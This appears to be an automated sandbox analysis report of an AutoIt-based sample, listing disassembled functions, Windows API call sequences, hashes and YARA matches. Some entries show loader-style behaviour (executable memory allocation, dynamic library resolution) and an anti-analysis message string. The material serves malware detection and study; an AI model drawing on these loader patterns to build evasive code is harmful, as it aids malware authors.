API String ID: 1552873950-2806939583
Opcode ID: efd064a603d84893df8023929229a86435fa7efd5de1f273ff7ab8f7b91873f8
Instruction ID: b4a74150b4bd6025edf7f7874089b781d62a7b89a52ad8b3ccefe0a591382678
Opcode Fuzzy Hash: efd064a603d84893df8023929229a86435fa7efd5de1f273ff7ab8f7b91873f8
Instruction Fuzzy Hash: 27514EB1904219AFDF24DF64DC81A9EBBB9FF48304F10009EB649A3241DB715A849F59

Function 00C6563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C6569B
_memcpy_s.LIBCMT ref: 00C6570D
__read_nolock.LIBCMT ref: 00C6576B
__filbuf.LIBCMT ref: 00C6578E
_memset.LIBCMT ref: 00C657D2

Part of subcall function 00C68D58: __getptd_noexit.LIBCMT ref: 00C68D58

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 51ae8bd52693bde68769d321a97f3b8d454675cff4de1a7b11249f9841b3ef71
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: EB519D30A10B0ADFDB348EA9C8C466EB7A5AF40324F348729F839962D0DB71DE51DB50

Function 00C452B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C452E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C4534A
TranslateMessage.USER32(?), ref: 00C45356
DispatchMessageW.USER32(?), ref: 00C45360

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 03b9f99f1399275496c83793edef41ab8e0f0dc1df85cebee861cf5487811f27
Instruction ID: 08e4f23b50979ac497f590b68c8dd82acacff30e9dbdec0b3752b538523a26ea
Opcode Fuzzy Hash: 03b9f99f1399275496c83793edef41ab8e0f0dc1df85cebee861cf5487811f27
Instruction Fuzzy Hash: 8931E830904B059BDB308FB5DC44BEA77F8BB41744F24405AF426DB2E2D7B5A985D721

Function 047241CC Relevance: 7.6, APIs: 5, Instructions: 72filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,04724268,?,00000000,04724288,?,?,?,?), ref: 0472421B
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,04724268,?,00000000,04724288), ref: 0472422A
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,04724268), ref: 0472423D
ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 04724253
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000), ref: 04724259

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: File$AllocCloseCreateHandleReadSizeVirtual
String ID:
API String ID: 2717999310-0
Opcode ID: 6af9f4a4ba8b4760d2dbed50acc302bd9f56981f6e97af64c7d8f56232917f37
Instruction ID: c446c9dbbe7692e99c7ac6ead1f59bdfca5ba4cfb1f58ba5468ba1c8ee96e3fb
Opcode Fuzzy Hash: 6af9f4a4ba8b4760d2dbed50acc302bd9f56981f6e97af64c7d8f56232917f37
Instruction Fuzzy Hash: 211190B0644304BFF721DBA5CD52F6ABBECEB49B14F614469FA50E66D0E670A9008A24

Function 017A05E1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,017A0759,00000000), ref: 017A063E
MessageBoxA.USER32(00000000,017A0781,017A0759,00000000), ref: 017A06B6

Strings

Executing manually will not work, xrefs: 017A0637
VyUZUiNl, xrefs: 017A060E

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: Message
String ID: Executing manually will not work$VyUZUiNl
API String ID: 2030045667-3440433283
Opcode ID: ec5d9c7304d96e1e1bf468327539283a058791fe564d890a5767eb09f298dfba
Instruction ID: 88d0ec12544168b663f3d31d2c77401ecc58249aa4c003bae3ea74a9c70f0542
Opcode Fuzzy Hash: ec5d9c7304d96e1e1bf468327539283a058791fe564d890a5767eb09f298dfba
Instruction Fuzzy Hash: EB314DB46442098BDF22EB54F895F9DF3B1EBDC710FE08A25F9006724EC674AC448BA1

Function 00C41284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C41275,SwapMouseButtons,00000004,?), ref: 00C412A8
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C41275,SwapMouseButtons,00000004,?), ref: 00C412C9
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00C41275,SwapMouseButtons,00000004,?), ref: 00C412EB

Strings

Control Panel\Mouse, xrefs: 00C412A6

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 3e1269669c807a2674ec008f316dccd441286602eff59bcad879f86d03b26228
Instruction ID: 433a92ec9ab8173fd6f66d26533755bf2050aae707aadfadff96b7fbea176acf
Opcode Fuzzy Hash: 3e1269669c807a2674ec008f316dccd441286602eff59bcad879f86d03b26228
Instruction Fuzzy Hash: 32112A75511208BFDB208FA9DC84FAFBBB8FF05741F14455AF845D7110D671AE8097A0

Function 017A0141 Relevance: 6.2, APIs: 4, Instructions: 199libraryloadermemoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 017A01D6
LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 017A0275
GetProcAddress.KERNEL32(00000000,?), ref: 017A02D9
GetProcAddress.KERNEL32(00000000,?), ref: 017A02F0

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: AddressProc$AllocLibraryLoadVirtual
String ID:
API String ID: 857568384-0
Opcode ID: 67f4aca988bb8421fb1f3761e279ba24af9bcc1412cdf79ab92b0c9b19e8c8b3
Instruction ID: 2718514bf33c887a0393fb74591f1f0c6eb8f97cb77b0db1842f1b6d985ba703
Opcode Fuzzy Hash: 67f4aca988bb8421fb1f3761e279ba24af9bcc1412cdf79ab92b0c9b19e8c8b3
Instruction Fuzzy Hash: A181E0719042299FDB61CF28CC81BDAF7B5FF99310F4486E5E988A7241D670AE908F90

Function 00C55B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C55B58

Part of subcall function 00C556F8: _memset.LIBCMT ref: 00C55787
Part of subcall function 00C556F8: _wcscpy.LIBCMT ref: 00C557DB
Part of subcall function 00C556F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C557EB

KillTimer.USER32(?,00000001,?,?), ref: 00C55BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C55BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C90D7C

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: c06561e543db2e55575dcff926d0b72b43cf3e23eb642e8d00053e17e80d3c30
Instruction ID: 3f4e7608d63bc2162e9ec179d3968920bc287a9b37c1ca4e183ea3c31810b90d
Opcode Fuzzy Hash: c06561e543db2e55575dcff926d0b72b43cf3e23eb642e8d00053e17e80d3c30
Instruction Fuzzy Hash: 06210A759057849FEB728B64C899BEABBECAF01308F10008DE69A56281C3742AC8CB55

Function 0179FE85 Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0179FF1C), ref: 0179FECD
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0179FF1C), ref: 0179FEDC
ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0179FF1C), ref: 0179FEFB
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0179FF01

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 85578641c48822194f7628642ecd30e5982f294c3dc0e53a3aa642566ecdc1b2
Instruction ID: da7a7270d4babcc3ba1e1fd5882d869ccfb6cf5cc4e44ecd877cd895272ea8e9
Opcode Fuzzy Hash: 85578641c48822194f7628642ecd30e5982f294c3dc0e53a3aa642566ecdc1b2
Instruction Fuzzy Hash: 981170B0644344BEEF11DB78EC95F9AFBF8DB1A710F2045A9F544E7191D67069048750

Function 0179FE8D Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0179FF1C), ref: 0179FECD
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0179FF1C), ref: 0179FEDC
ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0179FF1C), ref: 0179FEFB
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0179FF01

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: d5a7594cd94fac33405629849cef832fef042dccc75886bc0b9c30314d446f01
Instruction ID: 8b9f0a495cfa230987e7ef5cdfb96c105f9e749a14d362984bec15e53d4d879f
Opcode Fuzzy Hash: d5a7594cd94fac33405629849cef832fef042dccc75886bc0b9c30314d446f01
Instruction Fuzzy Hash: 11116DB0644304BEEF11EFB9EC86F9AF7ECDB09710F200465B614E7294E6706A048690

Function 00C5278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00C549C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C527AF,?,00000001), ref: 00C549F4

_free.LIBCMT ref: 00C8FB04
_free.LIBCMT ref: 00C8FB4B

Part of subcall function 00C529BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C52ADF

Strings

Bad directive syntax error, xrefs: 00C8FB33

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 6a538069e2e57367dd1694e372e05db06a649cfaeb58c24cfa5df8ce53c659b4
Instruction ID: f3d94b055a4b50f7b459fd54b8c7a9f263550a5e973e7201caabddb45b935fe0
Opcode Fuzzy Hash: 6a538069e2e57367dd1694e372e05db06a649cfaeb58c24cfa5df8ce53c659b4
Instruction Fuzzy Hash: 0E91A175900219AFCF18EFA4CC919EEB7B4FF05314F14452EF816AB291DB30AA46EB54

Function 00CA9CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C54AB2: __fread_nolock.LIBCMT ref: 00C54AD0

_wcscmp.LIBCMT ref: 00CA9DE1
_wcscmp.LIBCMT ref: 00CA9DF4

Strings

FILE, xrefs: 00CA9D2D

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: bb00d6c6ee74aac739a3d6237f1fc7fd0e21e97c06742764f52813f52cfa9316
Instruction ID: 3ce88d796b6feb822c1b5066563db57afdb9efdf1150e9c344ce457529747ef1
Opcode Fuzzy Hash: bb00d6c6ee74aac739a3d6237f1fc7fd0e21e97c06742764f52813f52cfa9316
Instruction Fuzzy Hash: B5410975A4020ABADF24DAA4CC46FEFBBFDDF46714F00047AFA00A7181D671AA849765

Function 00C531BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9032B
GetOpenFileNameW.COMDLG32(?), ref: 00C90375

Part of subcall function 00C60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C52A58,?,00008000), ref: 00C602A4

Part of subcall function 00C609C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00C609E4

Strings

X, xrefs: 00C90343

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: cc125a1b933ab3eb959bd7ea823adfd6a5f3217898d9e947b45dbe2b9788b9b6
Instruction ID: 416c68e9055ba860aea1de736eb10ec26a1eae5eb53834dbcec18bf3c41b8540
Opcode Fuzzy Hash: cc125a1b933ab3eb959bd7ea823adfd6a5f3217898d9e947b45dbe2b9788b9b6
Instruction Fuzzy Hash: 5721C671A002889BCF51DFD4C845BEE7BF8AF49301F10405AE808A7241DBB45A8CDFA1

Function 017A05D1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,017A0759,00000000), ref: 017A063E
MessageBoxA.USER32(00000000,017A0781,017A0759,00000000), ref: 017A06B6

Strings

Executing manually will not work, xrefs: 017A0637
VyUZUiNl, xrefs: 017A060E

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: Message
String ID: Executing manually will not work$VyUZUiNl
API String ID: 2030045667-3440433283
Opcode ID: 53dea2aa25581dd5ef89b42fff8c20b02ee0a61964cbfbb70b67098123f5d281
Instruction ID: a2282aaafcabbf0d84c1a479baf51eb3765d456b436929e28e598570381d4eda
Opcode Fuzzy Hash: 53dea2aa25581dd5ef89b42fff8c20b02ee0a61964cbfbb70b67098123f5d281
Instruction Fuzzy Hash: E10122B02483858FEF179720AC25F59FBA4E7CA700FF04AA6F140A718BC575AC088662

Function 00CBD1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 557d8fe49362104889967eca1d4b6c9bf8e4ac7292b7e422d199e35d5927faa9
Instruction ID: 11fcb7971163afaed21e09eba6b63135327f8da2db7f3036bb8a5a37f642ac48
Opcode Fuzzy Hash: 557d8fe49362104889967eca1d4b6c9bf8e4ac7292b7e422d199e35d5927faa9
Instruction Fuzzy Hash: 55F139706083419FC714DF28C484A6ABBE5FF88314F14896EF89A9B351E771E945CF92

Function 00C4AAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C607BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C607EC
Part of subcall function 00C607BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C607F4
Part of subcall function 00C607BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C607FF
Part of subcall function 00C607BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C6080A
Part of subcall function 00C607BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C60812
Part of subcall function 00C607BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6081A

Part of subcall function 00C5FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C4AC6B), ref: 00C5FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C4AD08
OleInitialize.OLE32(00000000), ref: 00C4AD85
CloseHandle.KERNEL32(00000000), ref: 00C82F56

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: fd037e5c1fba2e8c0d57ce14e25a964735585e079ec781340c30dd84baec53fb
Instruction ID: a15010c7c2d961beb17dffef53a404e3139202cef7543d10f32943d31c7068c8
Opcode Fuzzy Hash: fd037e5c1fba2e8c0d57ce14e25a964735585e079ec781340c30dd84baec53fb
Instruction Fuzzy Hash: E28188B0D093808ED388EF69AD887597EE8FB99304710856AD81DCB3B2E770A445DB75

Function 00C6593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00C65953

Part of subcall function 00C6A39B: __NMSG_WRITE.LIBCMT ref: 00C6A3C2
Part of subcall function 00C6A39B: __NMSG_WRITE.LIBCMT ref: 00C6A3CC

__NMSG_WRITE.LIBCMT ref: 00C6595A

Part of subcall function 00C6A3F8: GetModuleFileNameW.KERNEL32(00000000,00D053BA,00000104,00000004,00000001,00C61003), ref: 00C6A48A
Part of subcall function 00C6A3F8: ___crtMessageBoxW.LIBCMT ref: 00C6A538

Part of subcall function 00C632CF: ___crtCorExitProcess.LIBCMT ref: 00C632D5
Part of subcall function 00C632CF: ExitProcess.KERNEL32 ref: 00C632DE

Part of subcall function 00C68D58: __getptd_noexit.LIBCMT ref: 00C68D58

RtlAllocateHeap.NTDLL(01750000,00000000,00000001,?,00000004,?,?,00C61003,?), ref: 00C6597F

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 622d45f9c39a4089ab1b70a0d1c1dbb35b2f5c3431350b8a712a3f98f3b7e533
Instruction ID: 4624f8d549e1f816c0c805d29966770bd2ec521e969dd8c430ce7548172eef54
Opcode Fuzzy Hash: 622d45f9c39a4089ab1b70a0d1c1dbb35b2f5c3431350b8a712a3f98f3b7e533
Instruction Fuzzy Hash: 68019235251B42DAE6353735A8C2B2F33989F52770F600126F929EB2E2DE708E025A75

Function 04725570 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020119,?,?,?,?,?,047207A9,?,00000000,0472090C,?,?,00000000), ref: 047255B6
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,80000002,00000000,00000000,00020119,?,?,?,?,?,047207A9), ref: 047255DD
RegCloseKey.ADVAPI32(?,80000002,00000000,00000000,00020119,?,?,?,?,?,047207A9,?,00000000,0472090C), ref: 04725602

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 7cd14f85f83da0a3d18bbbaf71cc1f94b6c2e6f1d76bb3f8637d768f8f304ce7
Instruction ID: 25f0caf7a5083cecf692f8e925f66a9bb9f52ed2d3a5ef69b056a761501df439
Opcode Fuzzy Hash: 7cd14f85f83da0a3d18bbbaf71cc1f94b6c2e6f1d76bb3f8637d768f8f304ce7
Instruction Fuzzy Hash: 9E115271A0021C6BEB10EA95DC81EEFB7BDAF58314F00416AE754E7241EA70FA448BA4

Function 04724A94 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04724B18,?,?,?,00000001), ref: 04724AD9
WriteFile.KERNEL32(00000000,?,00000000,04724B99,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04724B18), ref: 04724AF1
CloseHandle.KERNEL32(00000000,00000000,?,00000000,04724B99,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04724B18), ref: 04724AFD

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 039c717b89b16a1d79a84219dd4afc2b8152ff38bd28decab096864bb0c3f3b6
Instruction ID: 38c176dd6116f3c14a1424fedb87913774ee73f058f671ace6aecee6e87402c6
Opcode Fuzzy Hash: 039c717b89b16a1d79a84219dd4afc2b8152ff38bd28decab096864bb0c3f3b6
Instruction Fuzzy Hash: 7401D471A003147FE720EAA8CC86F6FB6BCDB45B14FA14179F610E72D0EA706E009564

Function 00CA92C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CA92D6

